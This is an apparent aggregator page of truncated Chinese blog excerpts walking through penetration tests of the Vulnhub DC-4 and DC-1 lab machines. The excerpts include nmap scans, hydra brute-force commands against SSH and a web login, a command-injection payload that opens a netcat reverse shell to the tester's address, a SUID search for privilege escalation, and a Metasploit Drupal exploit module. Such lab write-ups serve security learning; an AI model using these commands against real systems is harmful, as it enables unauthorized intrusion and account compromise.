DC4靶机】的更多相关文章

DC-4靶机渗透 扫描内网机器,看到143是开启的,那么ok了,确定了目标主机的地址. 对其进行进一步的端口扫描,80,22端口都是开放的. 访问具体网页,进行爆破,分别为admin,happy. 里面能够执行三种命令,看一下中间的包,发现命令直接进行了显示,那可以直接构造反弹shell了,当前身份是在www-data目录下 radio=nc+192.168.114.128+9090+-e+/bin/bash&submit=Run 反弹成功,利用python进入交互模式: 查找了三个用户,在ji…
Vulnhub dc-4靶机通关 下载地址:https://download.vulnhub.com/dc/DC-4.zip 安装好dc-4靶机 使用局域网查看器扫描到ip地址 端口扫描,发现运行了80端口和22端口,22开放ssh服务 访问网站,发现只有一个登录界面,目录扫描无果,那就爆破密码,然后发现无密码,随意登录 来到command.php文件,发现可以执行系统命令,猜测是通过post请求控制执行的系统命令,使用bp抓包 如下,radio控制的是所输入的命令 通过查找etc/passwd…
仅供个人娱乐 靶机信息 下载地址:http://www.five86.com/downloads/DC-4.zip 一.主机扫描 arp-scan -l nmap -p 1-65535 -A -sV 192.168.17.130 二.信息收集 dirb http://192.168.17.130 三.漏洞查找和利用 爆破ssh hydra -L /root/user.txt -P /root/rockyou.txt -t 5 ssh://192.168.17.130 字典设置太大了. web页面…
DC-4 渗透测试 冲冲冲,努力学习 .掌握 hydra ,nc反弹shell 记住你要干嘛, 找地方上传shell(大多以后台登录为切入点,再反弹shell),shell提权到root 操作机:kali 172.66.66.129 靶机:DC-4 172.66.66.134 网络模式:NAT 信息收集 基于ARP的网络扫描工具netdiscover ARP是将IP地址转化物理地址的网络协议. 通过该协议,可以判断某个IP地址是否被使用,从而发现网络中存活的主机. 使用很简单(扫描本地网络):…
用nmap扫描ip和端口,发现只开启了22ssh端口和80http端口 打开网页只有一个登录界面 目录爆破没有发现什么有用的,尝试对登录进行弱口令爆破 一开始使用burpsuite,使用一个小字典进行爆破但是没有爆破出来,尝试用一个大字典来爆破,于是用了kali的usr/share/wordlist的rockyou字典,但是由于字典太大了导不进burpsuite,所以用hydra hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168…
信息搜集 nmap -sP 192.168.146.0/24 #扫网段看看存活的主机,找到靶机 nmap -sS -Pn -A 192.168.146.141 可以看到开放了22和80端口,那么就可以猜测下,可能要爆破ssh密码或者得到账号密码直接ssh连上去. 这里先访问web页面,只有一个登陆页面,那就先扫描下目录. 看到访问command.php后又跳转回index.php,那么估计是要登陆才可以使用了. getFlag Web登陆密码爆破 这里没什么线索,但是登陆不用填验证码,就直接尝试…
Vulnhub DC-4 一.环境搭建 下载链接:https://www.vulnhub.com/entry/dc-4,313/ 解压后用VMware打开,导入虚拟机 网卡配置看个人习惯,我喜欢NAT 二.信息搜集 1.arp-scan 扫出ip arp-scan 192.168.124.0/24 2.Nmap 扫描端口 扫描全端口,怕漏掉信息 nmap -sV -p 1-65535 -T4 -A 只开了22和80,留意一下系统版本 提权可能会有用 3.扫web目录 三.漏洞发现 打开页面发现是…
目录 1.suid提权 2.rbash绕过 3.git提权 4.Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation 5.sudoer配置文件错误提权 1.suid提权 运行某些程序时暂时获得root的权限,例如ping(socket需要root才能运行) 搜索符合条件的可以用来提权的: find / -perm -u=s -type f 2>/dev/null f…
DC-1靶机 端口加内网主机探测,发现192.168.114.146这台主机,并且开放了有22,80,111以及48683这几个端口. 发现是Drupal框架. 进行目录的扫描: 发现admin被禁止访问,以及robots.txt并进行访问,发现都是权限不足,查看一下漏洞. 看到一个远程命令执行漏洞,并且metasploit里面是能直接用的. 得到shell,这里使用到的模块是exploit/unix/webapp/drupal_drupalgeddon2 . ls看到第一个flag. 继续切换…
DC1 文章前提概述 本文介绍DC-1靶机的渗透测试流程 涉及知识点(比较基础): nmap扫描网段端口服务 msf的漏洞搜索 drupal7的命令执行利用 netcat反向shell mysql的基本操作 sudi提权 基本环境搭建 靶机下载地址:http://www.five86.com/downloads/DC-1.zip https://download.vulnhub.com/dc/DC-1.zip VMware(windows):https://www.52pojie.cn/thre…